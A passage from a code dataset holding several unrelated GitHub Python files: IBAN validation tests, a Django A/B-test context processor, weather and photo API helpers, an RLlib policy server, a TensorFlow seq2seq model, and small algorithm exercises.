NonAlphaNumericError, InvalidCountryError, InvalidLengthError\nfrom app.src.validation import (\n _format_iban_string,\n _check_iban_length,\n _iban_string_to_integer,\n iban_is_valid,\n)\n\nVALID_IBAN = \"AL35202111090000000001234567\"\n\n\ndef test_iban_is_valid():\n \"\"\"Test the main validation function\"\"\"\n\n assert iban_is_valid(iban=VALID_IBAN)\n assert not iban_is_valid(iban=\"AL35202111090000000001234568\")\n\n with pytest.raises(NonAlphaNumericError):\n iban_is_valid(iban=VALID_IBAN + \"!\")\n with pytest.raises(InvalidLengthError):\n iban_is_valid(iban=VALID_IBAN + \"1\")\n with pytest.raises(InvalidCountryError):\n iban_is_valid(iban=\"XX35202111090000000001234567\")\n\n\ndef test_format_iban_string():\n \"\"\"Test formatting function\"\"\"\n assert _format_iban_string(iban=VALID_IBAN) == VALID_IBAN\n assert _format_iban_string(iban=\"al 352021 110900000000 01234567\") == VALID_IBAN\n with pytest.raises(NonAlphaNumericError):\n _format_iban_string(iban=\"!! aa .<.<. 01234567\")\n\n\ndef test_iban_length_is_valid():\n \"\"\"Test length checking function\"\"\"\n _check_iban_length(iban=VALID_IBAN, country=\"AL\")\n with pytest.raises(InvalidLengthError):\n _check_iban_length(iban=VALID_IBAN + \"1\", country=\"AL\")\n\n\ndef test_iban_string_to_integer():\n \"\"\"Test string to integer conversion function\"\"\"\n assert _iban_string_to_integer(iban=\"AAAA123\") == 12310101010\n\n","repo_name":"kofhagstrom/iban-validator","sub_path":"tests/test_iban_validator.py","file_name":"test_iban_validator.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29761022406","text":"from logging import getLogger\nfrom settings import AB_TEST_REQUEST_NAME, AB_TEST_CONTEXT_NAME, AB_TEST_FAIL_SILENT_CONTEXT, AB_TEST_LOGGER_CONTEXT\n\nclass StringFacade(str):\n def __init__(self, raw):\n str.__init__(self, raw.name)\n self.raw = raw\n\nclass TestFacade(StringFacade):\n def __init__(self, raw):\n StringFacade.__init__(self, raw)\n\n @property\n def goals(self):\n return self.raw.goals.all()\n\nclass ExperimentFacade(StringFacade):\n def __init__(self, raw):\n StringFacade.__init__(self, raw)\n self.test = None\n\n @property\n def experiments(self):\n if not self.test:\n return None\n return self.test.experiments.all()\n\nlogger = getLogger(AB_TEST_LOGGER_CONTEXT)\n\ndef ab(request):\n #noinspection PyBroadException\n try:\n if hasattr(request, AB_TEST_REQUEST_NAME):\n experiments = {}\n for test, result in getattr(request, AB_TEST_REQUEST_NAME).items():\n exp = ExperimentFacade(result.experiment)\n exp.test = test\n experiments[TestFacade(test)] = exp\n return {AB_TEST_CONTEXT_NAME : experiments}\n except Exception as ex:\n logger.error(\"error, putting abTest [%s] into context: %s\", AB_TEST_CONTEXT_NAME, ex)\n if not AB_TEST_FAIL_SILENT_CONTEXT:\n raise\n\n return {}\n","repo_name":"camillo/django-abTest","sub_path":"abTest/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"24650732733","text":"from .keys import PEXELS_API_KEY, OPEN_WEATHER_API_KEY\nimport requests\nimport json\n\n\ndef get_photo(city):\n # Use the Pexels API\n header = {\"Authorization\": PEXELS_API_KEY}\n param = {\"query\": city}\n url = \"https://api.pexels.com/v1/search\"\n response = requests.get(url, params=param, headers=header)\n content = json.loads(response.content)\n try:\n return {\"picture_url\": content[\"photos\"][0][\"src\"][\"original\"]}\n except (KeyError, IndexError):\n return {\"picture_url\": None}\n\n\ndef get_weather_data(city, state):\n geocoding_params = {\n \"q\": f\"{city},{state},US\",\n \"limit\": 1,\n \"appid\": OPEN_WEATHER_API_KEY,\n }\n geocoding_url = \"http://api.openweathermap.org/geo/1.0/direct\"\n response = requests.get(geocoding_url, params=geocoding_params)\n\n content = response.json()\n\n try:\n latitude = content[0][\"lat\"]\n longitude = content[0][\"lon\"]\n except (KeyError, IndexError):\n return None\n\n weather_url = \"https://api.openweathermap.org/data/2.5/weather\"\n\n weather_params = {\n \"lat\": latitude,\n \"lon\": longitude,\n \"appid\": OPEN_WEATHER_API_KEY,\n \"units\": \"imperial\",\n }\n\n response = requests.get(weather_url, params=weather_params)\n content = response.json()\n\n try:\n description = content[\"weather\"][0][\"description\"]\n temp = content[\"main\"][\"temp\"]\n except (KeyError, IndexError):\n return None\n\n return {\"description\": description, \"temp\": temp}\n","repo_name":"Killianjyk/conference-app","sub_path":"monolith/events/acls.py","file_name":"acls.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31861495529","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\"\"\"Example of running a policy server. Copy this file for your use case.\n\nTo try this out, in two separate shells run:\n $ python cartpole_server.py\n $ python cartpole_client.py\n\"\"\"\n\nimport os\nfrom gym import spaces\nimport numpy as np\n\nimport ray\nfrom ray.rllib.agents.dqn import DQNAgent\nfrom ray.rllib.env.serving_env import ServingEnv\nfrom ray.rllib.utils.policy_server import PolicyServer\nfrom ray.tune.logger import pretty_print\nfrom ray.tune.registry import register_env\n\nSERVER_ADDRESS = \"localhost\"\nSERVER_PORT = 8900\nCHECKPOINT_FILE = \"last_checkpoint.out\"\n\n\nclass CartpoleServing(ServingEnv):\n def __init__(self):\n ServingEnv.__init__(\n self, spaces.Discrete(2),\n spaces.Box(low=-10, high=10, shape=(4, ), dtype=np.float32))\n\n def run(self):\n print(\"Starting policy server at {}:{}\".format(SERVER_ADDRESS,\n SERVER_PORT))\n server = PolicyServer(self, SERVER_ADDRESS, SERVER_PORT)\n server.serve_forever()\n\n\nif __name__ == \"__main__\":\n ray.init()\n register_env(\"srv\", lambda _: CartpoleServing())\n\n # We use DQN since it supports off-policy actions, but you can choose and\n # configure any agent.\n dqn = DQNAgent(\n env=\"srv\",\n config={\n # Use a single process to avoid needing to set up a load balancer\n \"num_workers\": 0,\n # Configure the agent to run short iterations for debugging\n \"exploration_fraction\": 0.01,\n \"learning_starts\": 100,\n \"timesteps_per_iteration\": 200,\n })\n\n # Attempt to restore from checkpoint if possible.\n if os.path.exists(CHECKPOINT_FILE):\n checkpoint_path = open(CHECKPOINT_FILE).read()\n print(\"Restoring from checkpoint path\", checkpoint_path)\n dqn.restore(checkpoint_path)\n\n # Serving and training loop\n while True:\n print(pretty_print(dqn.train()))\n checkpoint_path = dqn.save()\n print(\"Last checkpoint\", checkpoint_path)\n with open(CHECKPOINT_FILE, \"w\") as f:\n f.write(checkpoint_path)\n","repo_name":"llan-ml/tesp","sub_path":"ray/rllib/examples/serving/cartpole_server.py","file_name":"cartpole_server.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"18"} +{"seq_id":"36362056609","text":"\"\"\"\nSimple seq2seq architecture for testing.\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.contrib.rnn import GRUCell as GRU\nfrom tensorflow.contrib.cudnn_rnn import CudnnGRU\nimport time\nimport os\nimport logging\nfrom tqdm import trange\nfrom model.seq2seq_model_helpers import encoder_layer,\\\n bidirectional_encoder_layer, \\\n decoder_layer\nfrom utils.Helpers import batch_splitter,\\\n SYMB_BEGIN,\\\n SYMB_END\nfrom nltk.tokenize.moses import MosesDetokenizer\n\n\n\nclass Seq2Seq:\n def __init__(self, n_layers, dictionaries, vocab_size, n_hidden_encoder,\n n_hidden_decoder, embed_dim, train_emb, answer_injection, batch_size,\n use_bi_encoder, use_attention, use_copy_mechanism, max_parallel_dec,\n gen_vocab_size, use_cudnn_gru):\n # Input variables\n self.n_hidden_encoder = n_hidden_encoder # Number of hidden units in encoder\n self.n_hidden_decoder = n_hidden_decoder # Number of hidden units in decoder\n self.n_layers = n_layers # The number of layers in encoder and decoder\n self.embed_dim = embed_dim # The size of the initial embedding vectors (e.g. GloVe)\n self.train_emb = train_emb # Bool: train embeddings or not\n self.batch_size = batch_size # Max. batch size\n\n self.word_dictionary = dictionaries[0] # The word dictionary, used in accuracy\n self.vocab_size = vocab_size # Size of the word vocabulary (unique word tokens)\n self.gen_vocab_size = gen_vocab_size # Vocab size for copy mechanism\n self.symbol_begin = self.word_dictionary[SYMB_BEGIN] # Integer of start of sequence mark\n self.symbol_end = self.word_dictionary[SYMB_END] # Integer of start of sequence mark\n self.answer_injection = answer_injection\n self.use_bi_encoder = use_bi_encoder\n self.use_attention = use_attention\n self.use_copy_mechanism = use_copy_mechanism\n self.use_cudnn_gru = use_cudnn_gru\n self.max_parallel_dec = max_parallel_dec\n\n # If a bidirectional encoder is used, then make sure the decoder has twice the units\n # to match the concatenated encoder state size (which is 2 * n_hidden_encoder)\n if self.use_bi_encoder:\n self.n_hidden_decoder *= 2\n\n # Graph initialization\n # See their explanation below in the build_graph() method\n self.document = None\n self.query = None\n self.target_query = None\n self.answer = None\n self.answer_mask = None\n self.document_mask = None\n self.query_mask = None\n self.learning_rate = None\n self.keep_prob = None\n self.prediction = None\n self.test = None\n self.updates = None\n # Accuracy and Loss measures\n self.loss = None # The categorical cross-entropy loss\n self.perplexity = None # The per-word perplexity (e^(seq_loss_by_example))\n\n # Tensorboard variables\n # Used to report accuracy and loss values to tensorboard during training/validation\n\n self.loss_summ = None\n self.perplexity_summ = None\n self.merged_summary = None\n\n def build_graph(self, grad_clip, embed_init, seed, max_doc_len, max_qry_len):\n # ================================================================================================\n # DEFINING GRAPH PLACEHOLDERS\n # ================================================================================================\n\n # Placeholder for integer representations of the document and query tokens.\n # These are tensors of shape [batch_size, max_length] where max_length is the length of the longest\n # document or query in the current batch.\n self.document = tf.placeholder(tf.int32, [None, None], name=\"document\") # Document words\n self.query = tf.placeholder(tf.int32, [None, None], name=\"query\") # Query words\n # Define the target query sequence, which is the same as the query but shifted:\n # Query: [SYMBOL_BEGIN, 1, 2, 3, SYMBOL_END] Target Query: [1, 2, 3, SYMBOL_END, SYMBOL_PAD]\n self.target_query = tf.placeholder(tf.int32, [None, None], name='target_query')\n # Placeholder for the ground truth answer's index in the document.\n # A tensor of shape [batch_size, 2]\n # The values refer to the answer's index in the document. Can be either the index among\n # tokens or chars.\n #\n # [[answer_start_0, answer_end_0]\n # [answer_start_1, answer_end_1]\n # [............................]\n # [answer_start_n, answer_end_n]] - where batch_size = n\n #\n self.answer = tf.placeholder(\n tf.int32, [None, 2], name=\"answer\")\n\n # Placeholder for document and query masks.\n # These are the same as the document and query placeholders above, except that they are binary,\n # having 0's where there is no token, and 1 where there is.\n # Example:\n # Assuming max_doc_len = 4 and batch_size = 3\n # <---4----> <---4---->\n # self.document = [[2, 5, 4, 7] ----> self.document_mask = [[1, 1, 1, 1] <-- document 1\n # [3, 2, 6, 0] [1, 1, 1, 0] <-- document 2\n # [2, 1, 0, 0]] [1, 1, 0, 0]] <-- document 3\n #\n # The masks are used to calculate the sequence length of each text sample going into\n # the bi-directional RNN.\n self.document_mask = tf.placeholder(\n tf.int32, [None, None], name=\"document_mask\")\n self.query_mask = tf.placeholder(\n tf.int32, [None, None], name=\"query_mask\")\n self.answer_mask = tf.placeholder(\n tf.float32, [None, None], name=\"answer_mask\")\n\n # Model parameters\n # Initial learning rate\n self.learning_rate = tf.placeholder(tf.float32, name=\"learning_rate\")\n # Keep probability = 1 - dropout probability\n self.keep_prob = tf.placeholder(tf.float32, name=\"keep_prob\")\n\n # =================================================================================================\n # BUILDING THE GRAPH\n # =================================================================================================\n\n # Embedding the document and query words.\n # For each word (represented by an integer) we look up the vector representation in either\n # a pre-trained word-vector dictionary or one that is initialized now.\n # See figure 1. in the paper (link at the top of this file). These embeddings are the leftmost\n # horizontal arrows in the figure going into the boxes named 'Embed'. Documents are blue, while the query\n # is green in the figure.\n # By default the word-vectors used are GloVe (Global Vectors) see the paper:\n # \"GloVe: Global Vectors for Word Representation\" by Pennington et al. 2014\n # Link to code, demo, paper: https://nlp.stanford.edu/projects/glove/\n #\n # This process means the documents go from 2 to 3 dimensional tensors:\n # before: [batch_size, max_document_length] -->\n # after: [batch_size, max_document_length, embedding_dimensions]\n #\n # The word-vectors are shaped [vocabulary_size, embedding_dimension]\n # so there is a word-vector for each unique word in the vocabulary\n #\n # EXAMPLE, assuming that:\n # batch_size = 2, max_document_length = 3, embedding_dim = 2, vocabulary_size = 3\n # <- 2-> <---3--->\n # word_vectors = [[1, 2] <- word 1 document = [[0, 1, 0] <- document 1\n # [3, 4] <- word 2 [1, 2, 0]] <- document 2\n # [5, 6]] <- word 3\n #\n # Then the document embeddings will be:\n # <----------3----------->\n # <- 2-> <- 2-> <- 2->\n # document_embed = [[[1, 2], [3, 4], [1, 2]] <- document 1\n # [[3, 4], [5, 6], [1, 2]]] <- document 2\n #\n\n # Creating the variable for the word_vectors\n # Embeddings are not supported on GPU, so placing on CPU to save memory\n with tf.device(\"/cpu:0\"):\n if embed_init is None: # If there are no pre-trained word vectors\n word_vectors = tf.get_variable(\n \"word_vectors\", [self.vocab_size, self.embed_dim],\n initializer=tf.glorot_normal_initializer(seed, tf.float32),\n trainable=self.train_emb)\n else: # Else, we use the pre-trained word-vectors\n word_vectors = tf.Variable(embed_init, trainable=self.train_emb,\n name=\"word_vectors\")\n\n # Embedding the document and query in the above word_vectors\n document_embedding = tf.nn.embedding_lookup(\n word_vectors, self.document, name=\"document_embedding\")\n query_embedding = tf.nn.embedding_lookup(\n word_vectors, self.query, name=\"query_embedding\")\n\n # # Assert embedding shapes are [None, max_length, embedding_dimensions]\n # assert document_embedding.shape.as_list() == [None, max_doc_len, self.embed_dim],\\\n # \"Expected document embedding shape [None, {}, {}] but got {}\".format(\n # max_doc_len, self.embed_dim, document_embedding.shape)\n # assert query_embedding.shape.as_list() == [None, max_qry_len, self.embed_dim],\\\n # \"Expected document embedding shape [None, {}, {}] but got {}\".format(\n # max_doc_len, self.embed_dim, query_embedding.shape)\n\n # Concatenating the answer mask with the document embedding\n if self.answer_injection:\n answer_mask_expanded = tf.expand_dims(self.answer_mask, axis=2)\n document_embedding = tf.concat([document_embedding, answer_mask_expanded], axis=2)\n\n # Assert document embedding (after answer_mask concatenation) shapes are:\n # # [None, max_length, embedding_dimensions]\n # assert document_embedding.shape.as_list() == [None, max_doc_len, self.embed_dim+1], \\\n # \"Expected document embedding shape [None, {}, {}] but got {}\".format(\n # max_doc_len, self.embed_dim+1, document_embedding.shape)\n\n # -----------------------------------------\n # Encoder Layer\n # -----------------------------------------\n rnn_cell = GRU\n\n # Pass the document to the encoder layer (either bidirectional or unidirectional)\n if self.use_bi_encoder:\n encoder_output, encoder_states = \\\n bidirectional_encoder_layer(rnn_cell, self.n_layers, self.document_mask,\n document_embedding, self.n_hidden_encoder,\n max_doc_len, self.keep_prob)\n else: # Use unidirectional encoder\n encoder_output, encoder_states = \\\n encoder_layer(rnn_cell, self.n_layers, self.document_mask, document_embedding,\n self.n_hidden_encoder, max_doc_len, self.keep_prob)\n\n current_batch_size = tf.to_int32(tf.shape(self.query)[0])\n\n logits_training, logits_inference = decoder_layer(encoder_states, encoder_output,\n query_embedding, self.query_mask,\n self.document,\n self.document_mask, word_vectors,\n rnn_cell,\n max_qry_len, self.vocab_size,\n self.gen_vocab_size,\n self.n_layers, self.n_hidden_decoder,\n self.keep_prob, self.use_attention,\n self.use_copy_mechanism, self.symbol_begin,\n self.symbol_end, current_batch_size,\n self.max_parallel_dec)\n\n # Getting the output from the decoder layer\n # RNN output is the full logit vector for each timestep\n # shape [batch_size, sequence_length, vocabulary_size] TODO: ASSERT THIS\n # sample_id is the argmax of the logit for each timestep,\n # that is, an index which can be passed\n # through an inverse word dictionary to see the predicted/generated words.\n # shape [batch_size, sequence_length] TODO: ASSERT THIS TOO\n logits_training = tf.identity(logits_training.rnn_output, name=\"logits\")\n sample_ids_inference = tf.identity(logits_inference.sample_id, name=\"predictions\")\n self.prediction = sample_ids_inference\n\n # -----------\n # LOSS\n # -----------\n\n # Cast and query mask as float32 for loss calculation\n query_mask_float = tf.cast(self.query_mask, dtype=tf.float32)\n\n # Slice target_query and query_mask to match first two dimensions with logits\n # Get the current size of logits' second dimension (seq. length)\n logits_shape_1 = tf.to_int32(tf.shape(logits_training)[1])\n # Perform the slice\n query_mask_sliced = tf.slice(query_mask_float, [0, 0], [current_batch_size, logits_shape_1])\n query_sliced = tf.slice(self.target_query, [0, 0], [current_batch_size, logits_shape_1])\n\n with tf.name_scope(\"seq2seq_loss\"):\n self.loss = tf.contrib.seq2seq.sequence_loss(logits_training,\n query_sliced,\n query_mask_sliced)\n\n self.perplexity = tf.exp(self.loss)\n\n # Define Optimizer\n vars_list = tf.trainable_variables()\n optimizer = tf.train.AdamOptimizer(self.learning_rate)\n\n # Gradient clipping\n grads, _ = tf.clip_by_global_norm(\n tf.gradients(self.loss, vars_list), grad_clip)\n self.updates = optimizer.apply_gradients(zip(grads, vars_list))\n # Save variables\n self.save_vars()\n\n # Tensorboard summaries\n self.loss_summ = tf.summary.scalar('seq2seq_loss', self.loss)\n self.perplexity_summ = tf.summary.scalar('seq2seq_perplexity', self.perplexity)\n self.merged_summary = tf.summary.merge_all()\n\n def save_vars(self):\n \"\"\"\n for restoring model\n \"\"\"\n tf.add_to_collection('document', self.document)\n tf.add_to_collection('document_mask', self.document_mask)\n tf.add_to_collection('query', self.query)\n tf.add_to_collection('target_query', self.target_query)\n tf.add_to_collection('query_mask', self.query_mask)\n tf.add_to_collection('answer', self.answer)\n tf.add_to_collection('answer_mask', self.answer_mask)\n tf.add_to_collection('keep_prob', self.keep_prob)\n tf.add_to_collection('loss', self.loss)\n tf.add_to_collection('perplexity', self.perplexity)\n tf.add_to_collection('prediction', self.prediction)\n tf.add_to_collection('updates', self.updates)\n tf.add_to_collection('learning_rate', self.learning_rate)\n\n def train(self, sess, training_data, dropout, learning_rate, iteration, writer, epoch, max_it):\n \"\"\"\n Performs one training iteration with input tuple of training data.\n \"\"\"\n document_array, document_character_array, query_array, query_character_array,\\\n answer_array, document_mask_array, query_mask_array, answer_mask_array,\\\n type_character_array, type_character_mask, target_query_array, filenames = training_data\n\n feed_dict = {self.document: document_array, self.query: query_array,\n self.target_query: target_query_array,\n self.answer: answer_array, self.document_mask: document_mask_array,\n self.query_mask: query_mask_array, self.keep_prob: 1 - dropout,\n self.learning_rate: learning_rate}\n\n # Feature marking the answer words in the document\n if self.answer_injection:\n feed_dict[self.answer_mask] = answer_mask_array\n\n if iteration % 50 == 0: # Get updated summary for Tensorboard every Xth iteration\n loss, updates = \\\n sess.run([self.loss, self.updates], feed_dict)\n\n # writer.add_summary(merged_summ, (epoch * max_it + iteration))\n else: # Otherwise, get regular updates\n # run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)\n # run_metadata = tf.RunMetadata()\n run_options = tf.RunOptions(report_tensor_allocations_upon_oom=True)\n loss, updates, summaries = \\\n sess.run([self.loss, self.updates, self.merged_summary], feed_dict,\n options=run_options)\n # writer.add_run_metadata(run_metadata, \"step{}\".format(epoch*max_it+iteration))\n writer.add_summary(summaries, int(epoch*max_it+iteration))\n # return loss, f1_score, exact_match_accuracy, updates\n return loss, updates\n\n def validate(self, sess, valid_batch_loader,\n inverse_word_dictionary,\n iteration=None, writer=None,\n epoch=None, max_it=None):\n \"\"\"\n Validate/Test the model\n \"\"\"\n it = loss = 0\n\n # Text predictions for inference\n prediction_text = []\n\n tr = trange(\n len(valid_batch_loader),\n desc=\"Loss: {:.3f}, Perplexity: {:.3f}\".format(0.0, 0.0, 0.0),\n leave=False,\n ascii=True)\n start_time = time.time()\n for validation_data in valid_batch_loader:\n it += 1\n total_seq_length = np.sum(validation_data[5])\n\n if total_seq_length > 8700:\n batch_split_1, batch_split_2 = batch_splitter(validation_data)\n validation_data = [batch_split_1, batch_split_2]\n else:\n validation_data = [validation_data] # Wrap it in list for loop\n\n for validation_batch in validation_data:\n document_array, document_character_array, query_array, query_character_array,\\\n answer_array, document_mask_array, query_mask_array, answer_mask_array,\\\n type_character_array, type_character_mask, target_query_array, filenames = validation_batch\n\n feed_dict = {self.document: document_array, self.query: query_array,\n self.target_query: target_query_array,\n self.answer: answer_array, self.document_mask: document_mask_array,\n self.query_mask: query_mask_array, self.keep_prob: 1.,\n self.learning_rate: 0.}\n\n # Feature marking the answer words in the document\n if self.answer_injection:\n feed_dict[self.answer_mask] = answer_mask_array\n\n try:\n loss_, prediction = \\\n sess.run([self.loss, self.prediction], feed_dict)\n except tf.errors.ResourceExhaustedError:\n print(\"GPU out of memory during validation.\"\n \" Total sequence length in batch was {},\"\n \"Skipping batch...\".format(total_seq_length))\n continue\n\n # Run current document, query and generated query through inverse word-dictionary\n # for printing at end of validation\n current_prediction = [[inverse_word_dictionary[word_value] for word_value in row]\n for row in prediction]\n current_document = [[inverse_word_dictionary[word_value] for word_value in row]\n for row in document_array]\n current_target_query = [[inverse_word_dictionary[word_value] for word_value in row]\n for row in target_query_array]\n current_query = [[inverse_word_dictionary[word_value] for word_value in row]\n for row in query_array]\n\n # print(\"Answer array: {}\".format(answer_array))\n # print(\"Document: {}\".format(current_document))\n current_answer = []\n for index, row in enumerate(current_document):\n answer_start = answer_array[index, 0]\n answer_end = answer_array[index, 1]\n current_answer.append(row[answer_start:answer_end+1])\n\n prediction_text.append([current_document, current_target_query,\n current_query, current_prediction, current_answer])\n\n loss += loss_\n current_perplexity = np.exp(loss_)\n tr.set_description(\"Loss: {:.3f}, Perplexity: {:.3f}\".\n format(loss_, current_perplexity))\n tr.update()\n tr.close()\n\n loss /= it\n perplexity = np.exp(loss)\n time_spent = (time.time() - start_time) / 60\n statement = \"loss: {:.3f}, perplexity: {:.3f} time: {:.1f}(m)\" \\\n .format(loss, perplexity, time_spent)\n logging.info(statement)\n # Logging example document, ground truth question and generated question\n detokenizer = MosesDetokenizer()\n\n # Print the first 10% of predictions for the validation set\n for i in range(int(len(prediction_text)/10)):\n doc = prediction_text[i][0][0]\n doc = [word for word in doc if word != \"@pad\"]\n # tgt_qry = prediction_text[i][1][0]\n # tgt_qry = [word for word in tgt_qry if word != \"@pad\"]\n qry = prediction_text[i][2][0]\n qry = [word for word in qry if word != \"@pad\"]\n gen_qry = prediction_text[i][3][0]\n ans = prediction_text[i][4][0]\n doc = detokenizer.detokenize(doc, return_str=True)\n # tgt_qry = detokenizer.detokenize(tgt_qry, return_str=True)\n qry = detokenizer.detokenize(qry, return_str=True)\n gen_qry = detokenizer.detokenize(gen_qry, return_str=True)\n ans = detokenizer.detokenize(ans, return_str=True)\n\n logging.info(\"Document: {}\".format(doc))\n # logging.info(\"Target Query: {}\".format(tgt_qry))\n logging.info(\"Answer: {}\".format(ans))\n logging.info(\"Query: {}\".format(qry))\n logging.info(\"Generated query: {}\\n\".format(gen_qry))\n\n return loss, perplexity\n\n def predict(self, sess, batch_loader, unlabeled=True):\n\n output = []\n tr = trange(\n len(batch_loader), leave=False, ascii=True)\n for samples in batch_loader:\n document_array, document_character_array, query_array, query_character_array,\\\n answer_array, document_mask_array, query_mask_array, answer_mask_array,\\\n type_character_array, type_character_mask, target_query_array, filenames = samples\n\n feed_dict = {self.document: document_array, self.query: query_array,\n self.target_query: target_query_array,\n self.answer: answer_array, self.document_mask: document_mask_array,\n self.query_mask: query_mask_array,\n self.keep_prob: 1., self.learning_rate: 0.}\n\n # Feature marking the answer words in the document\n if self.answer_injection:\n feed_dict[self.answer_mask] = answer_mask_array\n\n document, query, answer, prediction = \\\n sess.run([self.document, self.query, self.answer, self.prediction], feed_dict)\n if unlabeled: # Only return the prediction and the respective question IDs\n output.append((prediction, filenames))\n else:\n output.append((document, query, answer, prediction, filenames))\n\n tr.update()\n tr.close()\n\n return output\n\n def restore(self, sess, checkpoint_dir, model_name, epoch):\n \"\"\"\n restore model\n \"\"\"\n model = '{}_epoch{}.ckpt'.format(model_name, epoch)\n checkpoint_path = os.path.join(checkpoint_dir,\n model)\n\n print(\"\\nRestoring model from: {}\\n\".format(checkpoint_path))\n\n loader = tf.train.import_meta_graph(checkpoint_path + '.meta')\n loader.restore(sess, checkpoint_path)\n logging.info(\"model restored from {}\".format(checkpoint_path))\n # restore variables from checkpoint\n self.document = tf.get_collection('document')[0]\n self.document_mask = tf.get_collection('document_mask')[0]\n self.target_query = tf.get_collection('target_query')[0]\n self.query = tf.get_collection('query')[0]\n self.query_mask = tf.get_collection('query_mask')[0]\n self.answer = tf.get_collection('answer')[0]\n self.answer_mask = tf.get_collection('answer_mask')[0]\n self.keep_prob = tf.get_collection('keep_prob')[0]\n self.loss = tf.get_collection('loss')[0]\n self.perplexity = tf.get_collection('perplexity')[0]\n self.prediction = tf.get_collection('prediction')[0]\n self.updates = tf.get_collection('updates')[0]\n self.learning_rate = tf.get_collection('learning_rate')[0]\n\n def save(self, sess, saver, checkpoint_dir, model_name, epoch):\n checkpoint_path = os.path.join(checkpoint_dir, '{}_epoch{}.ckpt'.format(model_name, epoch))\n saver.save(sess, checkpoint_path)\n logging.info(\"model saved to {}\".format(checkpoint_path))","repo_name":"peters92/ssqa","sub_path":"src/model/generative_domain_adaptive_net/model/seq2seq_model.py","file_name":"seq2seq_model.py","file_ext":"py","file_size_in_byte":26319,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"35922806341","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def rightSideView(self, root: Optional[TreeNode]) -> List[int]:\n res = []\n q = collections.deque([root])\n \n while q:\n rightSide = None #to keep track of right child\n \n for i in range(len(q)):\n node = q.popleft()\n if node:\n rightSide = node #update the rightside with node as right side will be the lat inserted\n q.append(node.left) #add 1st left and then right\n q.append(node.right)\n\n if rightSide: #if righSide not null\n res.append(rightSide.val)\n return res\n \n #Time complexity: O(N) since one has to visit each node.\n\n #Space complexity: O(D) to keep the queues, where D is a tree diameter","repo_name":"SanketRevadigar/LeetCode","sub_path":"199-binary-tree-right-side-view/199-binary-tree-right-side-view.py","file_name":"199-binary-tree-right-side-view.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13805077586","text":"\"\"\"\r\nAuthor : Johanna & Gwenaël\r\nDate : 21/09/2020\r\nVersion : 1\r\nDescription: Atelier 5\r\n\"\"\"\r\n\r\nimport time\r\nimport random\r\nimport matplotlib\r\n\r\n\r\ndef sort_list(list_elt:list)->list:\r\n liste:list=list_elt[:]\r\n for j in liste :\r\n for i in range(1,len(liste)):\r\n if(liste[i] (list, list):\r\n \"\"\"\r\n Calcule performance des fonctions en parametre\r\n\r\n :param func1: 1ere fonction à tester\r\n :param func2: 2e fonction à tester\r\n :param lst_size: liste des tailles des listes pour les parametres\r\n :param nbr_exec: nombre d'execution pour les moyennes (default 10)\r\n\r\n :return: (perf1, perf2)\r\n \"\"\"\r\n perfs_f1 = []\r\n perfs_f2 = []\r\n\r\n for size in lst_size:\r\n # Calule de perfs pour func1\r\n start_time = time.perf_counter()\r\n lst = [i for i in range(size)]\r\n for i in range(nbr_exec):\r\n func1(lst)\r\n\r\n stop_time = time.perf_counter()\r\n perfs_f1.append((stop_time - start_time) / nbr_exec)\r\n\r\n # Calcule de perfs pour func2\r\n start_time = time.perf_counter()\r\n for i in range(nbr_exec):\r\n func2(lst)\r\n\r\n stop_time = time.perf_counter()\r\n perfs_f2.append((stop_time - start_time) / nbr_exec)\r\n\r\n return (perfs_f1, perfs_f2)\r\n\r\n\r\ndef draw_graph(lst_size: list, perfs: list):\r\n \"\"\"\r\n Dessine un graphique matplotlib des perfs en fonction de lst_size\r\n\r\n :param lst_size: Axe des abcisses\r\n :param perfs: Performances des fonctions\r\n \"\"\"\r\n\r\n fig, ax = plt.subplots()\r\n ax.plot(lst_size, perfs[0], label=\"Fonction 1\")\r\n ax.plot(lst_size, perfs[1], label=\"Fonction 2\")\r\n ax.set(xlabel=\"Taille des listes\", ylabel=\"Temps d'execution moyen\", title=\"Graph des perfs\")\r\n ax.legend(loc=\"upper center\")\r\n plt.show()\r\n\r\n\r\nsizes = [5, 10, 20, 40, 80, 100, 500, 1000]\r\nperfs = perf_mix(mix_list, random.shuffle, sizes, 10)\r\ndraw_graph(sizes, perfs)","repo_name":"johakespeare/infoL3","sub_path":"PycharmProjects/atelier5/exercice6.py","file_name":"exercice6.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"29081636001","text":"def word_break(s, word_dict):\n n = len(s)\n dp = [False] * (n + 1)\n dp[0] = True\n\n for i in range(1, n + 1):\n for j in range(i):\n if dp[j] and s[j:i] in word_dict:\n dp[i] = True\n break\n\n return dp[n]\n","repo_name":"Grodd91/Python","sub_path":"Algorithms/Word Break/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"74989570601","text":"from bs4 import BeautifulSoup\nimport urllib3\nimport requests\nimport pprint\n\ndef hasNumbers(inputString):\n\treturn any(char.isdigit() for char in inputString)\n\n# Data Structure:\n# This one takes a while to run\n# {\n# \tname: \"ICO NAME\",\n# \tdescription: \"description\",\n# \tcategory: \"ico stuff\"\n# \twebsite: \"http.website.com\",\n# \twhitepaper: \".pdf\",\n# \ttwitter: \"twitter.com\",\n# \ttelegram: \"t.me\",\n# \tslack: \"slack\",\n# \tteam: [],\n# \tamt_raised = \"232323\",\n# 